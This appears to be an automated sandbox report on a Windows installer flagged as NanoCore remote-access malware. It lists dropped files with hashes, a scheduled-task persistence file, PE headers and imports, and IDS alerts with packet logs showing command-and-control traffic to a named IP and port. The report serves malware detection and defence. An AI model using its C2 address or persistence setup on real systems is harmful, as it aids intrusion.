              Encrypted:false
              SSDEEP:384:4sowZo58r1ZAbGTBDPHglPB51T7nkxop4D+Znha2+K5wUcatJsIfX:Cwu58r1oGTBGPK6pq+p42+ZCtJsA
              MD5:1288423DC0799D420E65125515BA8198
              SHA1:F1CB23453DFEFED3BD256EBD8FE9C1FCE230E901
              SHA-256:BE749029D5FFBA43EBCD1BE38E8486BA88FD77A39B08266CFE79C9FA21CF3466
              SHA-512:60B548402CC56A944EAF8BBE0186F02633BED0F267154BEA5844273C13F4B122D2EA7D8980B288AA0D272A742D49107E6DE558B26BDD98583F787AC7D1895BAC
              Malicious:false
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ T._A:._A:._A:.....^A:..^>.]A:..]4.^A:..^0.[A:.K*;.JA:._A;..A:...>.^A:...:.^A:.....^A:...8.^A:.Rich_A:.........PE..L.....ya...........!.....&...,...............@............................................@..........................A..L...xC.......p...............................A...............................................@..p............................text..."$.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......6..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsv8A14.tmp\fbnwl.dll
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:modified
              Size (bytes):22016
              Entropy (8bit):6.644684115150565
              Encrypted:false
              SSDEEP:384:4sowZo58r1ZAbGTBDPHglPB51T7nkxop4D+Znha2+K5wUcatJsIfX:Cwu58r1oGTBGPK6pq+p42+ZCtJsA
              MD5:1288423DC0799D420E65125515BA8198
              SHA1:F1CB23453DFEFED3BD256EBD8FE9C1FCE230E901
              SHA-256:BE749029D5FFBA43EBCD1BE38E8486BA88FD77A39B08266CFE79C9FA21CF3466
              SHA-512:60B548402CC56A944EAF8BBE0186F02633BED0F267154BEA5844273C13F4B122D2EA7D8980B288AA0D272A742D49107E6DE558B26BDD98583F787AC7D1895BAC
              Malicious:false
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ T._A:._A:._A:.....^A:..^>.]A:..]4.^A:..^0.[A:.K*;.JA:._A;..A:...>.^A:...:.^A:.....^A:...8.^A:.Rich_A:.........PE..L.....ya...........!.....&...,...............@............................................@..........................A..L...xC.......p...............................A...............................................@..p............................text..."$.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......6..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1315
              Entropy (8bit):5.148995150358009
              Encrypted:false
              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK07bxtn:cbk4oL600QydbQxIYODOLedq3Wj
              MD5:EA990AF5897960534A4B53B9AE469852
              SHA1:C9409D6DA2EF73DA46D2F252FACDA1577F7B31C8
              SHA-256:16415204477AB850AF7AA39E29ADD5D6BB0DA97F2E8BB68F906D3B82F9BEE163
              SHA-512:DAA2BDEB5CA246B5D7383005FE2A4B3975321B4330E8777AD71FDD840A057F17E12137FBDC3FFB86346C23A755BC230E2ECABD68BBCC215D11EA506A684A46A4
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:data
              Category:modified
              Size (bytes):232
              Entropy (8bit):7.089541637477408
              Encrypted:false
              SSDEEP:3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
              MD5:9E7D0351E4DF94A9B0BADCEB6A9DB963
              SHA1:76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
              SHA-256:AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
              SHA-512:93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
              Malicious:false
              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:Non-ISO extended-ASCII text, with no line terminators
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:3:HCf:if
              MD5:AB6ACF2514CF9D7C146288805B82395A
              SHA1:B45A987160D4F1CF2BF65398D7BDB0DDFDF966F9
              SHA-256:4ADBC5F80F47F6FC3B6EF126648722F05DE66E8F32A6248B08AEB3F986B99D76
              SHA-512:6F93CE445AB368DC3DAC4A81C3814AB8F0DD2E8C5CA67532C1171E676BA792F5101DBE25A587198FA75130C0DCF309460DDD1E50AE46FDE55141B0820FB49B1F
              Malicious:true
              Preview: s....H
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:data
              Category:dropped
              Size (bytes):24
              Entropy (8bit):4.584962500721156
              Encrypted:false
              SSDEEP:3:9bzY6oRDJoTBn:RzWDqTB
              MD5:3FCC766D28BFD974C68B38C27D0D7A9A
              SHA1:45ED19A78D9B79E46EDBFC3E3CA58E90423A676B
              SHA-256:39A25F1AB5099005A74CF04F3C61C3253CD9BDA73B85228B58B45AAA4E838641
              SHA-512:C7D47BDAABEEBB8C9D9B31CC4CE968EAF291771762FA022A2F55F9BA4838E71FDBD3F83792709E47509C5D94629D6D274CC933371DC01560D13016D944012DA5
              Malicious:false
              Preview: 9iH...}Z.4..f.....l.d
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:data
              Category:dropped
              Size (bytes):40
              Entropy (8bit):5.221928094887364
              Encrypted:false
              SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
              MD5:AE0F5E6CE7122AF264EC533C6B15A27B
              SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
              SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
              SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
              Malicious:false
              Preview: 9iH...}Z.4..f..... 8.j....|.&X..e.F.*.
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:data
              Category:dropped
              Size (bytes):426832
              Entropy (8bit):7.999527918131335
              Encrypted:true
              SSDEEP:6144:zKfHbamD8WN+JQYrjM7Ei2CsFJjyh9zvgPonV5HqZcPVT4Eb+Z6no3QSzjeMsdF/:zKf137EiDsTjevgArYcPVLoTQS+0iv
              MD5:653DDDCB6C89F6EC51F3DDC0053C5914
              SHA1:4CF7E7D42495CE01C261E4C5C4B8BF6CD76CCEE5
              SHA-256:83B9CAE66800C768887FB270728F6806CBEBDEAD9946FA730F01723847F17FF9
              SHA-512:27A467F2364C21CD1C6C34EF1CA5FFB09B4C3180FC9C025E293374EB807E4382108617BB4B97F8EBBC27581CD6E5988BB5E21276B3CB829C1C0E49A6FC9463A0
              Malicious:false
              Preview: ..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h*...J4*...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.*h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H........*...OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........*X...b*Z...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..
              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
              Process:C:\Users\user\Desktop\RHK098760045678009000.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):52
              Entropy (8bit):4.4002543244019225
              Encrypted:false
              SSDEEP:3:oN0naRR3c2dSTuCU/Ln:oNcSRlQTSTn
              MD5:6E6E1881C289567E83AAD0435BF4C72D
              SHA1:29DB6951579EA2E838154DED33E575806C797AA7
              SHA-256:3956537EFB18EC09EA2D6A0B831DBFC9EACFE59364873C8D5B55F8C21BCF46C3
              SHA-512:62D095D1DCD6184799D3E26F6473F39037C4804D1400844E347EA30AEF12B4667C141FC2A9F184F8C7C2CE852E4B154B1600DE5C338E4BA6710EBD9E1FDBCC25
              Malicious:false
              Preview: C:\Users\user\Desktop\RHK098760045678009000.exe

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.37562465733928
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:RHK098760045678009000.exe
              File size:446374
              MD5:8ae8a20159a1fdedd8c4937e8cc4c571
              SHA1:a68c405aa1bec64c9790c321b4785c98f5c9a2a6
              SHA256:bd386b60f5a095f369d4473d5f3185c226363a563f45326cea048e10f0ff403b
              SHA512:ae7ec190db374595c4612f937f8ff98172b4a9c828e218806498e6443c0490cfdf92fe7a8f2b965dc34015c5b5e004dd02c53289a55c94e194f079b0e8017261
              SSDEEP:6144:vBlL/qJ0hAJgtOHh6K6wiqyv/9nWZbcqzr2VURH2W1yS1dk3kqA/eFaTQH:J+0hAgtOHEK61B/9yn662WwS1dkdAfTo
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

              File Icon

              Icon Hash:30f0ccbaf2e47182

              Static PE Info

              General

              Entrypoint:0x4030fb
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:b76363e9cb88bf9390860da8e50999d2

              Entrypoint Preview

              Instruction
              sub esp, 00000184h
              push ebx
              push ebp
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+20h], ebx
              mov dword ptr [esp+14h], 00409168h
              mov dword ptr [esp+1Ch], ebx
              mov byte ptr [esp+18h], 00000020h
              call dword ptr [004070B0h]
              call dword ptr [004070ACh]
              cmp ax, 00000006h
              je 00007F3C2CECD9D3h
              push ebx
              call 00007F3C2CED07B4h
              cmp eax, ebx
              je 00007F3C2CECD9C9h
              push 00000C00h
              call eax
              mov esi, 00407280h
              push esi
              call 00007F3C2CED0730h
              push esi
              call dword ptr [00407108h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F3C2CECD9ADh
              push 0000000Dh
              call 00007F3C2CED0788h
              push 0000000Bh
              call 00007F3C2CED0781h
              mov dword ptr [00423F44h], eax
              call dword ptr [00407038h]
              push ebx
              call dword ptr [0040726Ch]
              mov dword ptr [00423FF8h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0041F4F0h
              call dword ptr [0040715Ch]
              push 0040915Ch
              push 00423740h
              call 00007F3C2CED03B4h
              call dword ptr [0040710Ch]
              mov ebp, 0042A000h
              push eax
              push ebp
              call 00007F3C2CED03A2h
              push ebx
              call dword ptr [00407144h]

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x23b90.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2d0000x23b900x23c00False0.522324355332data5.54550086743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2d2b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
              RT_ICON0x3dad80xa498PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
              RT_ICON0x47f700x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
              RT_ICON0x4c1980x25a8dataEnglishUnited States
              RT_ICON0x4e7400x10a8dataEnglishUnited States
              RT_ICON0x4f7e80x988dataEnglishUnited States
              RT_ICON0x501700x468GLS_BINARY_LSB_FIRSTEnglishUnited States
              RT_DIALOG0x505d80x100dataEnglishUnited States
              RT_DIALOG0x506d80x11cdataEnglishUnited States
              RT_DIALOG0x507f80x60dataEnglishUnited States
              RT_GROUP_ICON0x508580x68dataEnglishUnited States
              RT_MANIFEST0x508c00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
              USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
              ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              10/27/21-12:35:22.661932TCP2025019ET TROJAN Possible NanoCore C2 60B497484445192.168.2.7185.222.57.90
              10/27/21-12:35:30.385238TCP2025019ET TROJAN Possible NanoCore C2 60B497494445192.168.2.7185.222.57.90
              10/27/21-12:35:36.308156TCP2025019ET TROJAN Possible NanoCore C2 60B497504445192.168.2.7185.222.57.90
              10/27/21-12:35:42.259470TCP2025019ET TROJAN Possible NanoCore C2 60B497534445192.168.2.7185.222.57.90
              10/27/21-12:35:46.512767TCP2025019ET TROJAN Possible NanoCore C2 60B497544445192.168.2.7185.222.57.90
              10/27/21-12:35:52.967208TCP2025019ET TROJAN Possible NanoCore C2 60B497554445192.168.2.7185.222.57.90
              10/27/21-12:35:59.180187TCP2025019ET TROJAN Possible NanoCore C2 60B497574445192.168.2.7185.222.57.90
              10/27/21-12:36:06.219324TCP2025019ET TROJAN Possible NanoCore C2 60B497584445192.168.2.7185.222.57.90
              10/27/21-12:36:12.240861TCP2025019ET TROJAN Possible NanoCore C2 60B497594445192.168.2.7185.222.57.90
              10/27/21-12:36:18.449942TCP2025019ET TROJAN Possible NanoCore C2 60B497874445192.168.2.7185.222.57.90
              10/27/21-12:36:25.461735TCP2025019ET TROJAN Possible NanoCore C2 60B498034445192.168.2.7185.222.57.90
              10/27/21-12:36:31.504021TCP2025019ET TROJAN Possible NanoCore C2 60B498074445192.168.2.7185.222.57.90
              10/27/21-12:36:37.609565TCP2025019ET TROJAN Possible NanoCore C2 60B498084445192.168.2.7185.222.57.90
              10/27/21-12:36:42.275628TCP2025019ET TROJAN Possible NanoCore C2 60B498174445192.168.2.7185.222.57.90
              10/27/21-12:36:49.658333TCP2025019ET TROJAN Possible NanoCore C2 60B498344445192.168.2.7185.222.57.90
              10/27/21-12:36:55.470444TCP2025019ET TROJAN Possible NanoCore C2 60B498354445192.168.2.7185.222.57.90
              10/27/21-12:37:01.316047TCP2025019ET TROJAN Possible NanoCore C2 60B498364445192.168.2.7185.222.57.90
              10/27/21-12:37:07.236455TCP2025019ET TROJAN Possible NanoCore C2 60B498414445192.168.2.7185.222.57.90
              10/27/21-12:37:13.129562TCP2025019ET TROJAN Possible NanoCore C2 60B498424445192.168.2.7185.222.57.90
              10/27/21-12:37:19.018469TCP2025019ET TROJAN Possible NanoCore C2 60B498434445192.168.2.7185.222.57.90

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 27, 2021 12:35:22.614408016 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.637341976 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.637481928 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.661931992 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.703679085 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.710825920 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.734333992 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.766468048 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.831394911 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.831465960 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.902771950 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.927371025 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:22.993540049 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:22.993611097 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.010178089 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.010201931 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.010217905 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.010235071 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.010247946 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.010256052 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.010281086 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.032808065 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032831907 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032860994 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032877922 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032895088 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032908916 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.032912016 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032928944 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032943964 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.032947063 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032948971 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.032958984 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.032974005 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.033010006 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055490971 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055502892 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055527925 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055557966 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055586100 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055613995 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055639982 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055651903 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055669069 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055696964 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055701017 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055711985 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055723906 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055740118 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055752039 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055778980 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055804968 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055826902 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055836916 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055862904 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055885077 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055902958 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.055953979 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.055963039 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078402996 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078474045 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078514099 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078516960 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078558922 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078600883 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078609943 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078646898 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078670979 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078715086 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078717947 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078744888 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078759909 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078799963 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078838110 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078840971 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078881025 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078918934 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078923941 CEST497484445192.168.2.7185.222.57.90
              Oct 27, 2021 12:35:23.078958035 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078994989 CEST444549748185.222.57.90192.168.2.7
              Oct 27, 2021 12:35:23.078995943 CEST497484445192.168.2.7185.222.57.90
